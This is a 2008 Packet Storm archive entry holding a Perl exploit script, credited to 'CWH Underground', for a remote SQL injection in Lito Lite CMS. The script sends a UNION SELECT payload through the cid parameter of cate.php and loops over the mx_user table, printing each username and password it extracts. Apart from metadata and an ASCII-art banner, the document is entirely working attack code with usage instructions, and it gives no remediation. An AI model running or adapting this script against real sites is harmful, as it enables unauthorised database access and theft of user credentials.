litolite-sql.txt

2008-11-30T00:00:00
ID PACKETSTORM:72437
Type packetstorm
Reporter CWH Underground
Modified 2008-11-30T00:00:00

Description

                                        
                                            `#!/usr/bin/perl -w  
#===========================================================  
# Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit  
#===========================================================  
#  
# ,--^----------,--------,-----,-------^--,  
# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..  
# `+---------------------------^----------|  
# `\_,-------, _________________________|  
# / XXXXXX /`| /  
# / XXXXXX / `\ /  
# / XXXXXX /\______(  
# / XXXXXX /   
# / XXXXXX /  
# (________(   
# `------'  
#  
#AUTHOR : CWH Underground  
#DATE : 29 November 2008  
#SITE : cwh.citec.us  
#  
#  
#####################################################  
#APPLICATION : Lito Lite CMS  
#DOWNLOAD : http://www.lovedesigner.net/files/download/lito_lite.zip  
######################################################  
#  
#Note: magic_quotes_gpc = off  
#  
#######################################################################################  
#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK  
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com  
#######################################################################################  
  
  
use LWP::UserAgent;  
use HTTP::Request;  
  
if ($#ARGV+1 != 2)  
{  
print "\n==============================================\n";  
print " Lito Lite Remote SQL Injection Exploit \n";  
print " \n";  
print " Discovered By CWH Underground \n";  
print "==============================================\n";  
print " \n";  
print " ,--^----------,--------,-----,-------^--, \n";  
print " | ||||||||| `--------' | O \n";  
print " `+---------------------------^----------| \n";  
print " `\_,-------, _________________________| \n";  
print " / XXXXXX /`| / \n";  
print " / XXXXXX / `\ / \n";  
print " / XXXXXX /\______( \n";  
print " / XXXXXX / \n";  
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";  
print " (________( \n";  
print " `------' \n";  
print " \n";   
print "Usage : ./xpl.pl <Target> <Data Limit>\n";  
print "Example: ./xpl.pl http://www.target.com/lito_lite 10\n";  
exit();  
}  
  
$target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0];  
$number = $ARGV[1];  
  
print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";  
print "\n ..:: SQL Injection Exploit By CWH Underground ::.. ";  
print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";  
print "\n[+]Dump Username and Password\n";  
  
for ($start=0;$start<$number;$start++) {  
  
$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";  
$req = HTTP::Request->new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x3a3a3a),5,6,7,8,9,10%20from%20mx_user%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";  
$res = $xpl->request($req);  
$info = $res->content;  
$count=$start+1;  
  
if ($info =~ /:::(.+):::/)  
{  
$dump=$1;  
($username,$password)= split('::',$dump);  
printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";  
}  
else {   
print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";  
exit;  
}  
}  
  
`